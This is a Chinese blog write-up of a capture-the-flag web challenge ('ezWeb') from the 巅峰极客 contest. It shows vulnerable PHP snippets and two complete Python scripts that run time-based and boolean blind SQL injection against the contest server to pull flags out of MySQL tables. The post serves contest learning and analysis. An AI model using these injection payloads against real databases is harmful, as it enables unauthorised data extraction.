巅峰极客
|
0
|
100
|
比赛

745 字
|
8 分钟

巅峰极客

学了大半个月的java,一次比赛都没出(出了也不会)
这次比赛重新认识自己的菜了。
这次比赛吃个大瓜。。。感觉ichunqiu的比赛真的py比其他地方多(个人感觉,也可能人比较多)。。。每次web题都是要么0-10解,要么7-80以上解,没有中间部分(大部分情况)。。。之前蓝帽杯也是,开赛一半发现忘记加qq群了,加进去不到半分钟,居然有人私聊我web思路?当然我没理(我不明白我这个菜鸡是怎么被人知道的)。所以平台封了半天,py倒是没减少(像我这种做不出题的fw就不用担心了XD)

ezWeb

赛后有人找到原题了:https://blog.maple3142.net/2022/08/01/uiuctf-2022-writeups/直接pro都不带咋改的
一开始看了半天,又有go又有c的,直接头昏昏沉沉的,睡了2个小时(昨晚熬了个大夜)。然后直到把pro那道题放出来。然后给的那个py文件有/review。直接审review的文件。

$result = mysqli_query($link,"SELECT * FROM reviewqueue WHERE id >= $startID AND id <= $endID");

这里明显啥过滤没有(除了黑名单那几个),但是死活不能注入。然后折腾半天,发现这个review是检索submit的那些网站,然后当review下面有东西的时候,就可以注入,但是只能时间盲注。所以先在submit那里上传几十个url,让它访问不过来,然后再进行盲注。然后经典的mysql8 table注入。脚本:

import time

import requests

url = 'http://123.56.236.86:27349/review/review.php'
url2 = 'http://123.56.236.86:27349/submit/index.php'
# files = {"file": "123"}
# data = {"PHP_SESSION_UPLOAD_PROGRESS": "123"}
cookies = {"PHPSESSID": "503j4g2mvgobh8pq27b8oqup7p"}

result = ''
i = 1
while (1):
    for i in range(32, 128):
        temp = result + chr(i)
        payload = {
            "startid": '0/**/and/**/if(((binary\'flag{%s\')>((table/**/flag1))),sleep(0.5),0)--' % (temp),
            "endid": "123"}
        # print(temp)
        res = requests.get(url).text
        if '0 pages queued in total' in res:
            data = {
                "url": "47.96.173.116",
                "worksafe": "on"
            }
            requests.post(url=url2, data=data, cookies=cookies)
        time1 = time.time()
        res = requests.post(url=url, cookies=cookies, data=payload).text
        # print(res)
        time2 =time.time()
        if time2 - time1 >= 0.5:
            result = result + chr(i - 1)
            print(result)
            break
print('[*]Result ' + result)
#flag{ffbbe0b1-dde9-4c71-912e-91b2be0fdb2d}
#

然后flag2不能在这里读取,因为sql用户不一样。所以找连接crawler用户数据库的那些php。然后比赛就结束了。。。赛后半小时才写出来XD。先是insert.php

$title = str_replace("\'", "\'\'", $_POST['title']);
        $title = str_replace("\"", "\"\"", $title);
        if(preg_match("/select|or| |#/i",$title)){
            $error = 'Error fetching index: ' . 'i dont know ';
            include 'error.html.php';
            exit();
        }

看上去能绕,尝试\"结果为\""居然没绕成,整tm不会了。然后只剩下一个tags.php

$url = mysqli_real_escape_string($link, $_POST['url']);
        $status = "";

        if( isset($_POST['tags']))
        {
            $tags = mysqli_real_escape_string($link, $_POST['tags']);
            if($tags==""){
                $result = mysqli_query($link,'UPDATE windex SET tags = NULL WHERE url = "'.$url.'";');
            }
            else{
                if(preg_match("/select|or| |#/i",$url)){
                    $error = 'Error fetching index: ' . 'i dont know ';
                    include 'error.html.php';
                    exit();
                }
                $result = mysqli_query($link,'UPDATE windex SET tags = "'.$tags.'" WHERE url = "'.$url.'";');
            }

看着mysqli_real_escape_string似乎绕不了,然后很神奇,居然可以注入,我不是很明白。。。如果直接一个双引号它直接报错,mysqli_real_escape_string这个函数是tm的摆设吗?然后就是一通乱试,然后发现两个参数都要sql注入就能出现布尔盲注,但是sleep函数不起作用(大雾)。直接贴一个脚本吧

import time

import requests

url = 'http://123.56.236.86:27349/tags/tags.php'
# url2 = 'http://123.56.236.86:27349/submit/index.php'
# files = {"file": "123"}
# data = {"PHP_SESSION_UPLOAD_PROGRESS": "123"}
cookies = {"PHPSESSID": "503j4g2mvgobh8pq27b8oqup7p"}

result = ''
i = 1
while (1):
    for i in range(32, 128):
        temp = result + chr(i)
        payload = {
            "tags": '2"/**/and/**/if(((binary\"%s\")>((table/**/flag2))),1,0)||"0' % (temp),
            "url": '"||"1'}
        # print(temp)
        # res = requests.get(url).text
        # if '0 pages queued in total' in res:
        #     data = {
        #         "url": "47.96.173.116",
        #         "worksafe": "on"
        #     }
        #     requests.post(url=url2, data=data, cookies=cookies)
        # time1 = time.time()
        res = requests.post(url=url, cookies=cookies, data=payload).text
        # print(res)
        # time2 =time.time()
        if '<input type="text" id="tags" name="tags" size="45" value="1">' in res:
            result = result + chr(i - 1)
            print(result)
            break
print('[*]Result ' + result)
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇